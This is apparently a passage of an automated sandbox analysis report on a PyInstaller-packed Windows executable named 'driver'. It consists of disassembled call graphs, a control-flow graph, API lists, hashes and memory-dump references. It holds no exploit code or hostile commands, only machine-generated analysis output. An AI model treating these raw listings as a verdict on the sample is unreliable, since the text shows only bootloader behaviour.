calls 17250->17251 17252 7ff6a29cdfc7 17251->17252 17252->17172 17253 7ff6a29ce053 17255 7ff6a29ca514 __std_exception_copy 37 API calls 17253->17255 17254->17253 17256 7ff6a29c4830 45 API calls 17254->17256 17259 7ff6a29ce095 memcpy_s 17255->17259 17256->17253 17257 7ff6a29ca970 _isindst 17 API calls 17258 7ff6a29ce140 17257->17258 17259->17257 17261 7ff6a29c0ccf 17260->17261 17262 7ff6a29c0cbe 17260->17262 17261->17262 17263 7ff6a29cd66c _fread_nolock 12 API calls 17261->17263 17262->17087 17264 7ff6a29c0d00 17263->17264 17265 7ff6a29c0d14 17264->17265 17266 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17264->17266 17267 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17265->17267 17266->17265 17267->17262 17269 7ff6a29c47d6 17268->17269 17271 7ff6a29c47de 17268->17271 17270 7ff6a29c4830 45 API calls 17269->17270 17270->17271 17271->17098 17273 7ff6a29cda41 17272->17273 17274 7ff6a29c486f 17272->17274 17273->17274 17275 7ff6a29d3374 45 API calls 17273->17275 17276 7ff6a29cda94 17274->17276 17275->17274 17277 7ff6a29c487f 17276->17277 17278 7ff6a29cdaad 17276->17278 17277->17020 17278->17277 17279 7ff6a29d26c0 45 API calls 17278->17279 17279->17277 17286 7ff6a29d6df8 17280->17286 17285 7ff6a29cf919 MultiByteToWideChar 17283->17285 17289 7ff6a29d6e5c 17286->17289 17287 7ff6a29bc5c0 _log10_special 8 API calls 17288 7ff6a29d012d 17287->17288 17288->17121 17289->17287 17291 7ff6a29c107f 17290->17291 17292 7ff6a29c106d 17290->17292 17295 7ff6a29c108d 17291->17295 17299 7ff6a29c10c9 17291->17299 17293 7ff6a29c4f78 _get_daylight 11 API calls 17292->17293 17294 7ff6a29c1072 17293->17294 17296 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17294->17296 17297 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17295->17297 17302 7ff6a29c107d 17296->17302 17297->17302 17298 7ff6a29c1445 17300 7ff6a29c4f78 _get_daylight 11 API calls 17298->17300 17298->17302 17299->17298 17301 7ff6a29c4f78 _get_daylight 11 API calls 17299->17301 17303 7ff6a29c16d9 17300->17303 17304 7ff6a29c143a 17301->17304 17302->16980 17305 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17303->17305 17306 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17304->17306 17305->17302 17306->17298 17308 7ff6a29c0774 17307->17308 17335 7ff6a29c04d4 17308->17335 17310 7ff6a29c078d 17310->16638 17347 7ff6a29c042c 17311->17347 17315 7ff6a29bc8c0 17314->17315 17316 7ff6a29b2930 GetCurrentProcessId 17315->17316 17317 7ff6a29b1c80 49 API calls 17316->17317 17318 7ff6a29b2979 17317->17318 17361 7ff6a29c49f4 17318->17361 17323 7ff6a29b1c80 49 API calls 17324 7ff6a29b29ff 17323->17324 17391 7ff6a29b2620 17324->17391 17327 7ff6a29bc5c0 _log10_special 8 API calls 17328 7ff6a29b2a31 17327->17328 17328->16677 17330 7ff6a29c0189 17329->17330 17331 7ff6a29b1b89 17329->17331 17332 7ff6a29c4f78 _get_daylight 11 API calls 17330->17332 17331->16676 17331->16677 17333 7ff6a29c018e 17332->17333 17334 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17333->17334 17334->17331 17336 7ff6a29c053e 17335->17336 17337 7ff6a29c04fe 17335->17337 17336->17337 17339 7ff6a29c054a 17336->17339 17338 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17337->17338 17345 7ff6a29c0525 17338->17345 17346 7ff6a29c54dc EnterCriticalSection 17339->17346 17345->17310 17348 7ff6a29b1a20 17347->17348 17349 7ff6a29c0456 17347->17349 17348->16646 17348->16647 17349->17348 17350 7ff6a29c0465 __scrt_get_show_window_mode 17349->17350 17351 7ff6a29c04a2 17349->17351 17354 7ff6a29c4f78 _get_daylight 11 API calls 17350->17354 17360 7ff6a29c54dc EnterCriticalSection 17351->17360 17355 7ff6a29c047a 17354->17355 17357 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17355->17357 17357->17348 17362 7ff6a29c4a4e 17361->17362 17363 7ff6a29c4a73 17362->17363 17365 7ff6a29c4aaf 17362->17365 17364 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17363->17364 17367 7ff6a29c4a9d 17364->17367 17400 7ff6a29c2c80 17365->17400 17369 7ff6a29bc5c0 _log10_special 8 API calls 17367->17369 17368 7ff6a29c4b8c 17370 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17368->17370 17371 7ff6a29b29c3 17369->17371 17370->17367 17379 7ff6a29c51d0 17371->17379 17373 7ff6a29c4b61 17376 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17373->17376 17374 7ff6a29c4bb0 17374->17368 17375 7ff6a29c4bba 17374->17375 17378 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17375->17378 17376->17367 17377 7ff6a29c4b58 17377->17368 17377->17373 17378->17367 17380 7ff6a29cb338 _get_daylight 11 API calls 17379->17380 17381 7ff6a29c51e7 17380->17381 17382 7ff6a29b29e5 17381->17382 17383 7ff6a29cec08 _get_daylight 11 API calls 17381->17383 17386 7ff6a29c5227 17381->17386 17382->17323 17384 7ff6a29c521c 17383->17384 17385 7ff6a29ca9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17384->17385 17385->17386 17386->17382 17538 7ff6a29cec90 17386->17538 17389 7ff6a29ca970 _isindst 17 API calls 17390 7ff6a29c526c 17389->17390 17392 7ff6a29b262f 17391->17392 17393 7ff6a29b9400 2 API calls 17392->17393 17394 7ff6a29b2660 17393->17394 17395 7ff6a29b266f MessageBoxW 17394->17395 17396 7ff6a29b2683 MessageBoxA 17394->17396 17397 7ff6a29b2690 17395->17397 17396->17397 17398 7ff6a29bc5c0 _log10_special 8 API calls 17397->17398 17399 7ff6a29b26a0 17398->17399 17399->17327 17401 7ff6a29c2cbe 17400->17401 17402 7ff6a29c2cae 17400->17402 17403 7ff6a29c2cc7 17401->17403 17412 7ff6a29c2cf5 17401->17412 17405 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17402->17405 17406 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17403->17406 17404 7ff6a29c2ced 17404->17368 17404->17373 17404->17374 17404->17377 17405->17404 17406->17404 17407 7ff6a29c4830 45 API calls 17407->17412 17409 7ff6a29c2fa4 17411 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17409->17411 17411->17402 17412->17402 17412->17404 17412->17407 17412->17409 17414 7ff6a29c3610 17412->17414 17440 7ff6a29c32d8 17412->17440 17470 7ff6a29c2b60 17412->17470 17415 7ff6a29c36c5 17414->17415 17416 7ff6a29c3652 17414->17416 17419 7ff6a29c371f 17415->17419 17420 7ff6a29c36ca 17415->17420 17417 7ff6a29c36ef 17416->17417 17418 7ff6a29c3658 17416->17418 17487 7ff6a29c1bc0 17417->17487 17425 7ff6a29c365d 17418->17425 17428 7ff6a29c372e 17418->17428 17419->17417 17419->17428 17438 7ff6a29c3688 17419->17438 17421 7ff6a29c36ff 17420->17421 17422 7ff6a29c36cc 17420->17422 17494 7ff6a29c17b0 17421->17494 17424 7ff6a29c366d 17422->17424 17431 7ff6a29c36db 17422->17431 17439 7ff6a29c375d 17424->17439 17473 7ff6a29c3f74 17424->17473 17425->17424 17429 7ff6a29c36a0 17425->17429 17425->17438 17428->17439 17501 7ff6a29c1fd0 17428->17501 17429->17439 17483 7ff6a29c4430 17429->17483 17431->17417 17433 7ff6a29c36e0 17431->17433 17435 7ff6a29c45c8 37 API calls 17433->17435 17433->17439 17434 7ff6a29bc5c0 _log10_special 8 API calls 17436 7ff6a29c39f3 17434->17436 17435->17438 17436->17412 17438->17439 17508 7ff6a29ce8c8 17438->17508 17439->17434 17441 7ff6a29c32e3 17440->17441 17442 7ff6a29c32f9 17440->17442 17443 7ff6a29c3337 17441->17443 17444 7ff6a29c36c5 17441->17444 17445 7ff6a29c3652 17441->17445 17442->17443 17446 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17442->17446 17443->17412 17449 7ff6a29c371f 17444->17449 17450 7ff6a29c36ca 17444->17450 17447 7ff6a29c36ef 17445->17447 17448 7ff6a29c3658 17445->17448 17446->17443 17453 7ff6a29c1bc0 38 API calls 17447->17453 17457 7ff6a29c365d 17448->17457 17459 7ff6a29c372e 17448->17459 17449->17447 17449->17459 17467 7ff6a29c3688 17449->17467 17451 7ff6a29c36ff 17450->17451 17452 7ff6a29c36cc 17450->17452 17455 7ff6a29c17b0 38 API calls 17451->17455 17454 7ff6a29c366d 17452->17454 17461 7ff6a29c36db 17452->17461 17453->17467 17456 7ff6a29c3f74 47 API calls 17454->17456 17469 7ff6a29c375d 17454->17469 17455->17467 17456->17467 17457->17454 17458 7ff6a29c36a0 17457->17458 17457->17467 17462 7ff6a29c4430 47 API calls 17458->17462 17458->17469 17460 7ff6a29c1fd0 38 API calls 17459->17460 17459->17469 17460->17467 17461->17447 17463 7ff6a29c36e0 17461->17463 17462->17467 17465 7ff6a29c45c8 37 API calls 17463->17465 17463->17469 17464 7ff6a29bc5c0 _log10_special 8 API calls 17466 7ff6a29c39f3 17464->17466 17465->17467 17466->17412 17468 7ff6a29ce8c8 47 API calls 17467->17468 17467->17469 17468->17467 17469->17464 17521 7ff6a29c0d84 17470->17521 17474 7ff6a29c3f96 17473->17474 17475 7ff6a29c0bf0 12 API calls 17474->17475 17476 7ff6a29c3fde 17475->17476 17477 7ff6a29ce5e0 46 API calls 17476->17477 17478 7ff6a29c40b1 17477->17478 17479 7ff6a29c40d3 17478->17479 17480 7ff6a29c4830 45 API calls 17478->17480 17481 7ff6a29c4830 45 API calls 17479->17481 17482 7ff6a29c415c 17479->17482 17480->17479 17481->17482 17482->17438 17484 7ff6a29c44b0 17483->17484 17485 7ff6a29c4448 17483->17485 17484->17438 17485->17484 17486 7ff6a29ce8c8 47 API calls 17485->17486 17486->17484 17488 7ff6a29c1bf3 17487->17488 17489 7ff6a29c1c22 17488->17489 17491 7ff6a29c1cdf 17488->17491 17490 7ff6a29c0bf0 12 API calls 17489->17490 17493 7ff6a29c1c5f 17489->17493 17490->17493 17492 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17491->17492 17492->17493 17493->17438 17495 7ff6a29c17e3 17494->17495 17496 7ff6a29c1812 17495->17496 17498 7ff6a29c18cf 17495->17498 17497 7ff6a29c0bf0 12 API calls 17496->17497 17500 7ff6a29c184f 17496->17500 17497->17500 17499 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17498->17499 17499->17500 17500->17438 17502 7ff6a29c2003 17501->17502 17503 7ff6a29c2032 17502->17503 17505 7ff6a29c20ef 17502->17505 17504 7ff6a29c0bf0 12 API calls 17503->17504 17507 7ff6a29c206f 17503->17507 17504->17507 17506 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17505->17506 17506->17507 17507->17438 17510 7ff6a29ce8f0 17508->17510 17509 7ff6a29ce935 17513 7ff6a29ce91e __scrt_get_show_window_mode 17509->17513 17516 7ff6a29ce8f5 __scrt_get_show_window_mode 17509->17516 17518 7ff6a29d0858 17509->17518 17510->17509 17512 7ff6a29c4830 45 API calls 17510->17512 17510->17513 17510->17516 17511 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17511->17516 17512->17509 17513->17511 17513->17516 17516->17438 17519 7ff6a29d087c WideCharToMultiByte 17518->17519 17522 7ff6a29c0db1 17521->17522 17523 7ff6a29c0dc3 17521->17523 17524 7ff6a29c4f78 _get_daylight 11 API calls 17522->17524 17525 7ff6a29c0dd0 17523->17525 17529 7ff6a29c0e0d 17523->17529 17526 7ff6a29c0db6 17524->17526 17528 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 17525->17528 17527 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17526->17527 17533 7ff6a29c0dc1 17527->17533 17528->17533 17530 7ff6a29c0eb6 17529->17530 17531 7ff6a29c4f78 _get_daylight 11 API calls 17529->17531 17532 7ff6a29c4f78 _get_daylight 11 API calls 17530->17532 17530->17533 17534 7ff6a29c0eab 17531->17534 17535 7ff6a29c0f60 17532->17535 17533->17412 17536 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17534->17536 17537 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17535->17537 17536->17530 17537->17533 17543 7ff6a29cecad 17538->17543 17539 7ff6a29cecb2 17540 7ff6a29c524d 17539->17540 17541 7ff6a29c4f78 _get_daylight 11 API calls 17539->17541 17540->17382 17540->17389 17542 7ff6a29cecbc 17541->17542 17544 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17542->17544 17543->17539 17543->17540 17545 7ff6a29cecfc 17543->17545 17544->17540 17545->17540 17546 7ff6a29c4f78 _get_daylight 11 API calls 17545->17546 17546->17542 17548 7ff6a29c82b5 17547->17548 17549 7ff6a29c82c8 17547->17549 17550 7ff6a29c4f78 _get_daylight 11 API calls 17548->17550 17557 7ff6a29c7f2c 17549->17557 17552 7ff6a29c82ba 17550->17552 17554 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17552->17554 17555 7ff6a29c82c6 17554->17555 17555->16697 17564 7ff6a29d0348 EnterCriticalSection 17557->17564 17566 7ff6a29b87a1 GetTokenInformation 17565->17566 17567 7ff6a29b8823 __vcrt_freefls 17565->17567 17568 7ff6a29b87c2 GetLastError 17566->17568 17569 7ff6a29b87cd 17566->17569 17570 7ff6a29b8836 CloseHandle 17567->17570 17571 7ff6a29b883c 17567->17571 17568->17567 17568->17569 17569->17567 17572 7ff6a29b87e9 GetTokenInformation 17569->17572 17570->17571 17571->16702 17572->17567 17573 7ff6a29b880c 17572->17573 17573->17567 17574 7ff6a29b8816 ConvertSidToStringSidW 17573->17574 17574->17567 17576 7ff6a29bc8c0 17575->17576 17577 7ff6a29b2b74 GetCurrentProcessId 17576->17577 17578 7ff6a29b26b0 48 API calls 17577->17578 17579 7ff6a29b2bc7 17578->17579 17580 7ff6a29c4c48 48 API calls 17579->17580 17581 7ff6a29b2c10 MessageBoxW 17580->17581 17582 7ff6a29bc5c0 _log10_special 8 API calls 17581->17582 17583 7ff6a29b2c40 17582->17583 17583->16712 17585 7ff6a29b25e5 17584->17585 17586 7ff6a29c4c48 48 API calls 17585->17586 17587 7ff6a29b2604 17586->17587 17587->16727 17623 7ff6a29c8804 17588->17623 17592 7ff6a29b81cc 17591->17592 17593 7ff6a29b9400 2 API calls 17592->17593 17594 7ff6a29b81eb 17593->17594 17595 7ff6a29b81f3 17594->17595 17596 7ff6a29b8206 ExpandEnvironmentStringsW 17594->17596 17664 7ff6a29d15c8 17623->17664 17763 7ff6a29b455a 17762->17763 17764 7ff6a29b9400 2 API calls 17763->17764 17765 7ff6a29b457f 17764->17765 17766 7ff6a29bc5c0 _log10_special 8 API calls 17765->17766 17767 7ff6a29b45a7 17766->17767 17767->16764 17769 7ff6a29b7e1e 17768->17769 17770 7ff6a29b7f42 17769->17770 17771 7ff6a29b1c80 49 API calls 17769->17771 17772 7ff6a29bc5c0 _log10_special 8 API calls 17770->17772 17773 7ff6a29b7ea5 17771->17773 17774 7ff6a29b7f73 17772->17774 17773->17770 17775 7ff6a29b1c80 49 API calls 17773->17775 17776 7ff6a29b4550 10 API calls 17773->17776 17777 7ff6a29b7efb 17773->17777 17774->16764 17775->17773 17776->17773 17778 7ff6a29b9400 2 API calls 17777->17778 17779 7ff6a29b7f13 CreateDirectoryW 17778->17779 17779->17770 17779->17773 17781 7ff6a29b1613 17780->17781 17782 7ff6a29b1637 17780->17782 17901 7ff6a29b1050 17781->17901 17784 7ff6a29b45b0 108 API calls 17782->17784 17785 7ff6a29b164b 17784->17785 17787 7ff6a29b1682 17785->17787 17788 7ff6a29b1653 17785->17788 17786 7ff6a29b1618 17791 7ff6a29b45b0 108 API calls 17787->17791 17790 7ff6a29c4f78 _get_daylight 11 API calls 17788->17790 17793 7ff6a29b1658 17790->17793 17794 7ff6a29b1696 17791->17794 17795 7ff6a29b2910 54 API calls 17793->17795 17796 7ff6a29b169e 17794->17796 17797 7ff6a29b16b8 17794->17797 17798 7ff6a29b1671 17795->17798 17799 7ff6a29b2710 54 API calls 17796->17799 17800 7ff6a29c0744 73 API calls 17797->17800 17798->16764 17829 7ff6a29b7134 17828->17829 17831 7ff6a29b717b 17828->17831 17829->17831 17965 7ff6a29c5094 17829->17965 17831->16764 17833 7ff6a29b4191 17832->17833 17834 7ff6a29b44d0 49 API calls 17833->17834 17835 7ff6a29b41cb 17834->17835 17836 7ff6a29b44d0 49 API calls 17835->17836 17837 7ff6a29b41db 17836->17837 17838 7ff6a29b422c 17837->17838 17839 7ff6a29b41fd 17837->17839 17841 7ff6a29b4100 51 API calls 17838->17841 17980 7ff6a29b4100 17839->17980 17842 7ff6a29b422a 17841->17842 17877 7ff6a29b1c80 49 API calls 17876->17877 17878 7ff6a29b4464 17877->17878 17878->16764 17902 7ff6a29b45b0 108 API calls 17901->17902 17903 7ff6a29b108c 17902->17903 17904 7ff6a29b1094 17903->17904 17905 7ff6a29b10a9 17903->17905 17906 7ff6a29b2710 54 API calls 17904->17906 17907 7ff6a29c0744 73 API calls 17905->17907 17912 7ff6a29b10a4 __vcrt_freefls 17906->17912 17908 7ff6a29b10bf 17907->17908 17909 7ff6a29b10c3 17908->17909 17910 7ff6a29b10e6 17908->17910 17912->17786 17966 7ff6a29c50a1 17965->17966 17967 7ff6a29c50ce 17965->17967 17968 7ff6a29c5058 17966->17968 17970 7ff6a29c4f78 _get_daylight 11 API calls 17966->17970 17969 7ff6a29c50f1 17967->17969 17973 7ff6a29c510d 17967->17973 17968->17829 17972 7ff6a29c4f78 _get_daylight 11 API calls 17969->17972 17971 7ff6a29c50ab 17970->17971 17974 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17971->17974 17975 7ff6a29c50f6 17972->17975 17976 7ff6a29c4fbc 45 API calls 17973->17976 17977 7ff6a29c50b6 17974->17977 17978 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 17975->17978 17979 7ff6a29c5101 17976->17979 17977->17829 17978->17979 17979->17829 18045 7ff6a29c5f38 18043->18045 18044 7ff6a29c5f5e 18046 7ff6a29c4f78 _get_daylight 11 API calls 18044->18046 18045->18044 18048 7ff6a29c5f91 18045->18048 18047 7ff6a29c5f63 18046->18047 18049 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 18047->18049 18050 7ff6a29c5fa4 18048->18050 18051 7ff6a29c5f97 18048->18051 18052 7ff6a29b4606 18049->18052 18062 7ff6a29cac98 18050->18062 18053 7ff6a29c4f78 _get_daylight 11 API calls 18051->18053 18052->16790 18053->18052 18075 7ff6a29d0348 EnterCriticalSection 18062->18075 18435 7ff6a29c7968 18434->18435 18438 7ff6a29c7444 18435->18438 18437 7ff6a29c7981 18437->16800 18439 7ff6a29c745f 18438->18439 18440 7ff6a29c748e 18438->18440 18441 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 18439->18441 18448 7ff6a29c54dc EnterCriticalSection 18440->18448 18443 7ff6a29c747f 18441->18443 18443->18437 18450 7ff6a29bfee1 18449->18450 18451 7ff6a29bfeb3 18449->18451 18452 7ff6a29bfed3 18450->18452 18459 7ff6a29c54dc EnterCriticalSection 18450->18459 18453 7ff6a29ca884 _invalid_parameter_noinfo 37 API calls 18451->18453 18452->16804 18453->18452 18461 7ff6a29b45b0 108 API calls 18460->18461 18462 7ff6a29b1493 18461->18462 18463 7ff6a29b14bc 18462->18463 18464 7ff6a29b149b 18462->18464 18465 7ff6a29b2710 54 API calls 18464->18465 18567 7ff6a29b6365 18566->18567 18568 7ff6a29b1c80 49 API calls 18567->18568 18569 7ff6a29b63a1 18568->18569 18570 7ff6a29b63cd 18569->18570 18571 7ff6a29b63aa 18569->18571 18573 7ff6a29b4620 49 API calls 18570->18573 18572 7ff6a29b2710 54 API calls 18571->18572 18596 7ff6a29b63c3 18572->18596 18574 7ff6a29b63e5 18573->18574 18575 7ff6a29b6403 18574->18575 18578 7ff6a29b2710 54 API calls 18574->18578 18576 7ff6a29b4550 10 API calls 18575->18576 18577 7ff6a29bc5c0 _log10_special 8 API calls 18580 7ff6a29b336e 18577->18580 18578->18575 18596->18577 20599 7ff6a29c5480 20600 7ff6a29c548b 20599->20600 20608 7ff6a29cf314 20600->20608 20621 7ff6a29d0348 EnterCriticalSection 20608->20621 19794 7ff6a29cf9fc 19795 7ff6a29cfbee 19794->19795 19797 7ff6a29cfa3e _isindst 19794->19797 19796 7ff6a29c4f78 _get_daylight 11 API calls 19795->19796 19814 7ff6a29cfbde 19796->19814 19797->19795 19800 7ff6a29cfabe _isindst 19797->19800 19798 7ff6a29bc5c0 _log10_special 8 API calls 19799 7ff6a29cfc09 19798->19799 19815 7ff6a29d6204 19800->19815 19805 7ff6a29cfc1a 19807 7ff6a29ca970 _isindst 17 API calls 19805->19807 19809 7ff6a29cfc2e 19807->19809 19812 7ff6a29cfb1b 19812->19814 19839 7ff6a29d6248 19812->19839 19814->19798 19816 7ff6a29d6213 19815->19816 19819 7ff6a29cfadc 19815->19819 19846 7ff6a29d0348 EnterCriticalSection 19816->19846 19821 7ff6a29d5608 19819->19821 19822 7ff6a29d5611 19821->19822 19823 7ff6a29cfaf1 19821->19823 19824 7ff6a29c4f78 _get_daylight 11 API calls 19822->19824 19823->19805 19827 7ff6a29d5638 19823->19827 19825 7ff6a29d5616 19824->19825 19826 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19825->19826 19826->19823 19828 7ff6a29d5641 19827->19828 19832 7ff6a29cfb02 19827->19832 19829 7ff6a29c4f78 _get_daylight 11 API calls 19828->19829 19830 7ff6a29d5646 19829->19830 19831 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19830->19831 19831->19832 19832->19805 19833 7ff6a29d5668 19832->19833 19834 7ff6a29d5671 19833->19834 19835 7ff6a29cfb13 19833->19835 19836 7ff6a29c4f78 _get_daylight 11 API calls 19834->19836 19835->19805 19835->19812 19837 7ff6a29d5676 19836->19837 19838 7ff6a29ca950 _invalid_parameter_noinfo 37 API calls 19837->19838 19838->19835 19847 7ff6a29d0348 EnterCriticalSection 19839->19847 19927 7ff6a29cc590 19938 7ff6a29d0348 EnterCriticalSection 19927->19938

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 7ff6a29b8bd0-7ff6a29b8d16 call 7ff6a29bc8c0 call 7ff6a29b9400 SetConsoleCtrlHandler GetStartupInfoW call 7ff6a29c5460 call 7ff6a29ca4ec call 7ff6a29c878c call 7ff6a29c5460 call 7ff6a29ca4ec call 7ff6a29c878c call 7ff6a29c5460 call 7ff6a29ca4ec call 7ff6a29c878c GetCommandLineW CreateProcessW 23 7ff6a29b8d18-7ff6a29b8d38 GetLastError call 7ff6a29b2c50 0->23 24 7ff6a29b8d3d-7ff6a29b8d79 RegisterClassW 0->24 31 7ff6a29b9029-7ff6a29b904f call 7ff6a29bc5c0 23->31 26 7ff6a29b8d81-7ff6a29b8dd5 CreateWindowExW 24->26 27 7ff6a29b8d7b GetLastError 24->27 29 7ff6a29b8ddf-7ff6a29b8de4 ShowWindow 26->29 30 7ff6a29b8dd7-7ff6a29b8ddd GetLastError 26->30 27->26 32 7ff6a29b8dea-7ff6a29b8dfa WaitForSingleObject 29->32 30->32 34 7ff6a29b8e78-7ff6a29b8e7f 32->34 35 7ff6a29b8dfc 32->35 36 7ff6a29b8e81-7ff6a29b8e91 WaitForSingleObject 34->36 37 7ff6a29b8ec2-7ff6a29b8ec9 34->37 39 7ff6a29b8e00-7ff6a29b8e03 35->39 40 7ff6a29b8fe8-7ff6a29b8ff2 36->40 41 7ff6a29b8e97-7ff6a29b8ea7 TerminateProcess 36->41 42 7ff6a29b8fb0-7ff6a29b8fc9 GetMessageW 37->42 43 7ff6a29b8ecf-7ff6a29b8ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->43 44 7ff6a29b8e05 GetLastError 39->44 45 7ff6a29b8e0b-7ff6a29b8e12 39->45 48 7ff6a29b9001-7ff6a29b9025 GetExitCodeProcess CloseHandle * 2 40->48 49 7ff6a29b8ff4-7ff6a29b8ffa DestroyWindow 40->49 50 7ff6a29b8eaf-7ff6a29b8ebd WaitForSingleObject 41->50 51 7ff6a29b8ea9 GetLastError 41->51 46 7ff6a29b8fdf-7ff6a29b8fe6 42->46 47 7ff6a29b8fcb-7ff6a29b8fd9 TranslateMessage DispatchMessageW 42->47 52 7ff6a29b8ef0-7ff6a29b8f28 MsgWaitForMultipleObjects PeekMessageW 43->52 44->45 45->36 53 7ff6a29b8e14-7ff6a29b8e31 PeekMessageW 45->53 46->40 46->42 47->46 48->31 49->48 50->40 51->50 56 7ff6a29b8f63-7ff6a29b8f6a 52->56 57 7ff6a29b8f2a 52->57 54 7ff6a29b8e33-7ff6a29b8e64 TranslateMessage DispatchMessageW PeekMessageW 53->54 55 7ff6a29b8e66-7ff6a29b8e76 WaitForSingleObject 53->55 54->54 54->55 55->34 55->39 56->42 59 7ff6a29b8f6c-7ff6a29b8f95 QueryPerformanceCounter 56->59 58 7ff6a29b8f30-7ff6a29b8f61 TranslateMessage DispatchMessageW PeekMessageW 57->58 58->56 58->58 59->52 60 7ff6a29b8f9b-7ff6a29b8fa2 59->60 60->40 61 7ff6a29b8fa4-7ff6a29b8fa8 60->61 61->42
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction ID: b0b0528cd220ea9c628e33689c8daac0aa9a44b99a1d1e5dd53f71b0a2577bba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FD1A532A4AB8286F7109F36E8542A977A1FF88F5CF400235DA5D83A96DF7CD105E740

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 62 7ff6a29b1000-7ff6a29b3806 call 7ff6a29bfe88 call 7ff6a29bfe90 call 7ff6a29bc8c0 call 7ff6a29c5460 call 7ff6a29c54f4 call 7ff6a29b36b0 76 7ff6a29b3814-7ff6a29b3836 call 7ff6a29b1950 62->76 77 7ff6a29b3808-7ff6a29b380f 62->77 83 7ff6a29b383c-7ff6a29b3856 call 7ff6a29b1c80 76->83 84 7ff6a29b391b-7ff6a29b3931 call 7ff6a29b45b0 76->84 78 7ff6a29b3c97-7ff6a29b3cb2 call 7ff6a29bc5c0 77->78 87 7ff6a29b385b-7ff6a29b389b call 7ff6a29b8a20 83->87 90 7ff6a29b3933-7ff6a29b3960 call 7ff6a29b7f80 84->90 91 7ff6a29b396a-7ff6a29b397f call 7ff6a29b2710 84->91 96 7ff6a29b38c1-7ff6a29b38cc call 7ff6a29c4fa0 87->96 97 7ff6a29b389d-7ff6a29b38a3 87->97 103 7ff6a29b3984-7ff6a29b39a6 call 7ff6a29b1c80 90->103 104 7ff6a29b3962-7ff6a29b3965 call 7ff6a29c00bc 90->104 99 7ff6a29b3c8f 91->99 111 7ff6a29b38d2-7ff6a29b38e1 call 7ff6a29b8a20 96->111 112 7ff6a29b39fc-7ff6a29b3a2a call 7ff6a29b8b30 call 7ff6a29b8b90 * 3 96->112 100 7ff6a29b38af-7ff6a29b38bd call 7ff6a29b8b90 97->100 101 7ff6a29b38a5-7ff6a29b38ad 97->101 99->78 100->96 101->100 113 7ff6a29b39b0-7ff6a29b39b9 103->113 104->91 121 7ff6a29b39f4-7ff6a29b39f7 call 7ff6a29c4fa0 